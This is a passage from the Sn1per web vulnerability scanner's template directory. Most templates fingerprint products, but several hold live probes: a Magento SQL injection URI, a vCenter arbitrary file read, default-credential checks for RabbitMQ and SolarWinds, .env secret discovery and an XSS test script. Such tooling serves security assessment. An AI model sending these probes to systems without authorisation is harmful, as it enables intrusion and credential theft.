METHOD='GET' 5 | MATCH="drupal\.org" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Drupal_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Detected 3' 3 | URI='/drupal/' 4 | METHOD='GET' 5 | MATCH="drupal\.org" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Drupal_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Detected 2' 3 | URI='/blog/' 4 | METHOD='GET' 5 | MATCH="drupal\.org" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Drupal_User_Login.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal User Login' 3 | URI='/user/login?destination=/' 4 | METHOD='GET' 5 | MATCH='user-login-form' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Drupal_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Version Disclosure' 3 | URI='/core/install.php?profile=default' 4 | METHOD='GET' 5 | MATCH='site-version' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/F5_BIG-IP_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='F5 BIG-IP Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='F5 BIG-IP' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/F5_BIG-IP_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='F5 BIG-IP Detected 2' 3 | URI='/tmui/login.jsp' 4 | METHOD='GET' 5 | MATCH='F5 BIG-IP' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Fortigate_Pulse_Connect_Secure_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortigate Pulse Connect Secure Detected' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH='<title>Please Login' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 1' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 2' 3 | URI=':10443/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 3' 3 | URI=':4443/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Frontpage_Service_Password_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Frontpage Service Password Disclosure' 3 | URI='/_vti_pvt/service.pwd' 4 | METHOD='GET' 5 | MATCH=' Frontpage' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Git_Config_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Git Config Detected 1' 3 | URI='/.git/config' 4 | METHOD='GET' 5 | MATCH="\[core\]" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/JK_Status_Manager.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='JK Status Manager' 3 | URI='/jkstatus/' 4 | METHOD='GET' 5 | MATCH="JK\ Status\ Manager" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Jaspersoft_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jaspersoft Detected' 3 | URI='/jasperserver/login.html?error=1' 4 | METHOD='GET' 5 | MATCH="Jaspersoft" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Jenkins_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jenkins Detected' 3 | URI='/login?from=%2F' 4 | METHOD='GET' 5 | MATCH="\[Jenkins\]" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Jetty_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jetty Version Disclosure Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='Powered by Jetty' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Jira_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected 1' 3 | URI='/secure/Dashboard.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Jira_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected 2' 3 | URI='/jira/secure/Dashboard.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Jira_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected' 3 | URI='/secure/ContactAdministrators!default.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Jolokia_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jolokia Version Disclosure' 3 | URI='/jolokia/version' 4 | METHOD='GET' 5 | MATCH="\"agent\"\:" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Joomla_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Detected 1' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='content="Joomla! ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Joomla_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Detected 1' 3 | URI='/joomla/' 4 | METHOD='GET' 5 | MATCH='content="Joomla! ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Joomla_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Version Disclosure' 3 | URI='/administrator/manifests/files/joomla.xml' 4 | METHOD='GET' 5 | MATCH="Joomla\ version\ " 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Laraval_Environment_File_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Laraval Environment File Found' 3 | URI='/.env' 4 | METHOD='GET' 5 | MATCH="DB_PASSWORD|REDIS_PASSWORD|MAIL_PASSWORD|AWS_SECRET|PUSHER_APP_|MIX_PUSHER_APP_" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/MS_SQL_Reporting_Server_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MS SQL Reporting Server Detected 1' 3 | URI='/ReportServer/pages/ReportViewer.aspx' 4 | METHOD='GET' 5 | MATCH='Microsoft\.Reporting' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/MS_SQL_Reporting_Server_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MS SQL Reporting Server Detected 2' 3 | URI='/Reports/Pages/Folder.aspx' 4 | METHOD='GET' 5 | MATCH='Microsoft\.Reporting' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Magento_2.3.0_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Magento 2.3.0 SQL Injection' 3 | URI="/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20-" 4 | METHOD='GET' 5 | MATCH="\[\]" 6 | SEVERITY='P1 - Critical' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Mailman_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Mailman Version Disclosure' 3 | URI='/mailman/listinfo' 4 | METHOD='GET' 5 | MATCH="Delivered\ by\ Mailman" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' 10 | -------------------------------------------------------------------------------- /Sn1per/templates/active/MobileIron_Login_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MobileIron Login 1' 3 | URI='/mifs/user/login.jsp' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/MobileIron_Login_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MobileIron Login 2' 3 | URI='/mifs/login.jsp' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/MobileIron_Login_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MobileIron Login 3' 3 | URI='/mifs/c/d/android.html' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/PHP_Composer_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='PHP Composer Disclosure' 3 | URI='/composer.json' 4 | METHOD='GET' 5 | MATCH='repositories|require-dev' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/PHP_Info.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='PHP Info Detected 1' 3 | URI='/phpinfo.php' 4 | METHOD='GET' 5 | MATCH='PHP Version ' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Palo_Alto_GlobalProtect_PAN-OS_Portal_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Palo Alto GlobalProtect PAN-OS Portal Detected' 3 | URI='/global-protect/login.esp' 4 | METHOD='GET' 5 | MATCH="<title>GlobalProtect" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/PulseSecure_VPN_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='PulseSecure VPN Detected' 3 | URI='/dana-na/auth/url_admin/welcome.cgi' 4 | METHOD='GET' 5 | MATCH='<title>SSL' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/RabbitMQ_Management_Default_Credentials.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='RabbitMQ Management Default Credentials' 3 | URI="/api/whoami" 4 | METHOD='GET' 5 | MATCH="{\"name\":\"guest\"" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-H "Content-Type: application/json" -H "Authorization: Z3Vlc3Q6Z3Vlc3Q=" --user-agent '' -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/RabbitMQ_Management_Interface_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='RabbitMQ Management Interface Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="<title>RabbitMQ Management" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Robots.txt_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Robots.txt Detected' 3 | URI='/robots.txt' 4 | METHOD='GET' 5 | MATCH='Disallow\:|Allow\:|Sitemap\:' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/SAP_NetWeaver_AS_JAVA_LM_Configuration_Wizard_Detection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-6287 - SAP NetWeaver AS JAVA LM Configuration Wizard Detection' 3 | URI='/CTCWebService/CTCWebServiceBean/ConfigServlet' 4 | METHOD='GET' 5 | MATCH="CTCWebServiceSi" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: text/xml; charset=UTF-8' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/SQLiteManager_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SQLiteManager Detected' 3 | URI='/sqlite/' 4 | METHOD='GET' 5 | MATCH='<title>SQLiteManager' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Sitemap.xml_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Sitemap.xml Detected' 3 | URI='/sitemap.xml' 4 | METHOD='GET' 5 | MATCH='<?xml\ ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/SolarWinds_Orion_Default_Credentials_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Default Credentials 1' 3 | URI='/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS' 4 | METHOD='GET' 5 | MATCH="totalRow" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' -------------------------------------------------------------------------------- /Sn1per/templates/active/SolarWinds_Orion_Default_Credentials_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Default Credentials 2' 3 | URI=':17778/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROW' 4 | METHOD='GET' 5 | MATCH="totalRow" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' -------------------------------------------------------------------------------- /Sn1per/templates/active/SolarWinds_Orion_Panel.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Panel' 3 | URI='/Orion/Login.aspx' 4 | METHOD='GET' 5 | MATCH="SolarWinds\ Orion" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/TeamQuest_Login_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='TeamQuest Login Found' 3 | URI='/teamquest/cgi-bin/login' 4 | METHOD='GET' 5 | MATCH="TeamQuest\ \-\ Login" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Telerik_File_Upload_Web_UI.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Telerik File Upload Web UI' 3 | URI='/Telerik.Web.UI.WebResource.axd?type=rau' 4 | METHOD='GET' 5 | MATCH="RadAsyncUpload\ handler\ is\ registered\ succesfully" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Tiki_Wiki_CMS_Groupware_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Tiki Wiki CMS Groupware' 3 | URI='/tiki-login.php' 4 | METHOD='GET' 5 | MATCH="Groupware" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Unauthenticated_Jenkins_Dashboard_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Unauthenticated Jenkins Dashboard Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="\[Jenkins\]" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/VMware_vCenter_Unauthenticated_Arbitrary_File_Read.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='VMware vCenter Unauthenticated Arbitrary File Read' 3 | URI='/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties' 4 | METHOD='GET' 5 | MATCH="dbtype|password\.ecrypted" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Weak_Authentication_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Weak Authentication' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='realm\=' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="-I -L --user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 10 | 11 | if [[ "$SSL" == "false" ]]; then 12 | SEVERITY='P2 - HIGH' 13 | fi -------------------------------------------------------------------------------- /Sn1per/templates/active/WebLogic_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='WebLogic Detected' 3 | URI='/console/login/LoginForm.jsp' 4 | METHOD='GET' 5 | MATCH='WebLogic' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Web_Config_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Web Config Detected 1' 3 | URI='/web.config' 4 | METHOD='GET' 5 | MATCH='<configuration>' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="-L --user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Weblogic_Application_Server_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Weblogic Application Server Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Weblogic\ Application\ Server" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Wordpres_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 1' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Wordpres_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 2' 3 | URI='/blog/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Wordpres_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 3' 3 | URI='/wordpress/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Wordpress_WP-File-Manager_Version_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress WP-File-Manager Version Detected' 3 | URI="/wp-content/plugins/wp-file-manager/readme.txt" 4 | METHOD='GET' 5 | MATCH="Stable\ tag\:" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/XSS.py: -------------------------------------------------------------------------------- 1 | # Import any WebDriver class that you would usually import from 2 | # selenium.webdriver from the seleniumrequests module 3 | import sys 4 | from seleniumrequests import Firefox 5 | 6 | url = sys.argv[1] 7 | # Simple usage with built-in WebDrivers: 8 | webdriver = Firefox() 9 | response = webdriver.request('GET', '%s/xss.php?xss=<script>document.write(INJECTX)</script>' % url) 10 | if '<script>document.write(INJECTX)</script>' in response.text: 11 | print("Vulnerable!") 12 | print(response.text) 13 | webdriver.quit() 14 | SECONDARY_COMMANDS='' 15 | -------------------------------------------------------------------------------- /Sn1per/templates/active/cPanel_Login_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='cPanel Login Found' 3 | URI='/' 4 | METHOD='GET' 5 | 